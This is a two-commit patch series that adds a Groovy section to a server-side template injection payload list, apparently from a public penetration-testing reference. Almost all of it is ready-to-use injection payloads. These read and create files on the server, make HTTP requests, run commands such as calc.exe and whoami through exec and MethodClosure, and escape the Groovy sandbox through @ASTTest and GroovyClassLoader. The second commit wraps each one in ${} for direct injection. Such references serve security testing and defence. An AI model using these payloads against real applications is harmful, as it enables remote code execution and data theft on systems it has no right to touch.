From 3db4d04467507e8ab2bca719c5ca20bf6b6ca8e2 Mon Sep 17 00:00:00 2001
From: 0x-nope
Date: Fri, 4 Mar 2022 17:39:28 +0100
Subject: [PATCH 1/2] added Groovy EL section
---
 Server Side Template Injection/README.md | 56 ++++++++++++++++++++++++
 1 file changed, 56 insertions(+)
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index b70b1e3..94f00d7 100644
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -15,6 +15,12 @@
 * [Freemarker](#freemarker)
 * [Basic injection](#freemarker---basic-injection)
 * [Code execution](#freemarker---code-execution)
+* [Groovy](#groovy)
+ * [Basic injection](#groovy---basic-injection)
+ * [Read/Create file](#groovy---read-and-create-file)
+ * [HTTP Request](#groovy---http-request)
+ * [Command execution](#groovy---command-execution)
+ * [Sandbox bypass](#groovy---sandbox-bypass)
 * [Handlebars](#handlebars)
 * [Jade / Codepen](#jade--codepen)
 * [Java](#java)
@@ -184,6 +190,56 @@ ${dwf.newInstance(ec,null)("id")}
 ---
+## Groovy
+
+[Official website](https://groovy-lang.org/)
+
+
+### Groovy - Basic injection
+
+Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection.
+
+
+### Groovy - Read and create File
+
+```groovy
+String x = new File('c:/windows/notepad.exe').text
+String x = new File('/path/to/file').getText('UTF-8')
+new File("C:\Temp\FileName.txt").createNewFile();
+```
+
+### Groovy - HTTP request:
+
+
+```groovy
+"http://www.google.com".toURL().text
+new URL("http://www.google.com").getText()
+```
+
+### Groovy - Command Execution
+
+```groovy
+"calc.exe".exec()
+"calc.exe".execute()
+this.evaluate("9*9") //(this is a Script)
+new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()
+```
+
+### Groovy - Sandbox Bypass
+
+```groovy
+@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
+def x
+```
+
+or
+
+```groovy
+new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
+```
+
+---
+
 ## Handlebars
+
 [Official website](https://handlebarsjs.com/)
From 59cae2ddb4d2e428ecc1f41194734dc6412244bf Mon Sep 17 00:00:00 2001
From: 0x-nope
Date: Wed, 20 Apr 2022 09:42:58 +0200
Subject: [PATCH 2/2] Update README.md
---
 Server Side Template Injection/README.md | 27 +++++++++++-------------
 1 file changed, 12 insertions(+), 15 deletions(-)
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 94f00d7..21f76c1 100644
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -194,48 +194,45 @@ ${dwf.newInstance(ec,null)("id")}
 [Official website](https://groovy-lang.org/)
-
 ### Groovy - Basic injection
 Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection.
-
 ### Groovy - Read and create File
 ```groovy
-String x = new File('c:/windows/notepad.exe').text
-String x = new File('/path/to/file').getText('UTF-8')
-new File("C:\Temp\FileName.txt").createNewFile();
+${String x = new File('c:/windows/notepad.exe').text}
+${String x = new File('/path/to/file').getText('UTF-8')}
+${new File("C:\Temp\FileName.txt").createNewFile();}
 ```
 ### Groovy - HTTP request:
-
 ```groovy
-"http://www.google.com".toURL().text
-new URL("http://www.google.com").getText()
+${"http://www.google.com".toURL().text}
+${new URL("http://www.google.com").getText()}
 ```
 ### Groovy - Command Execution
 ```groovy
-"calc.exe".exec()
-"calc.exe".execute()
-this.evaluate("9*9") //(this is a Script)
-new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()
+${"calc.exe".exec()}
+${"calc.exe".execute()}
+${this.evaluate("9*9") //(this is a Script class)}
+${new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()}
 ```
 ### Groovy - Sandbox Bypass
 ```groovy
-@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
-def x
+${ @ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
+def x }
 ```
 or
 ```groovy
-new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
+${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") }
 ```
 ---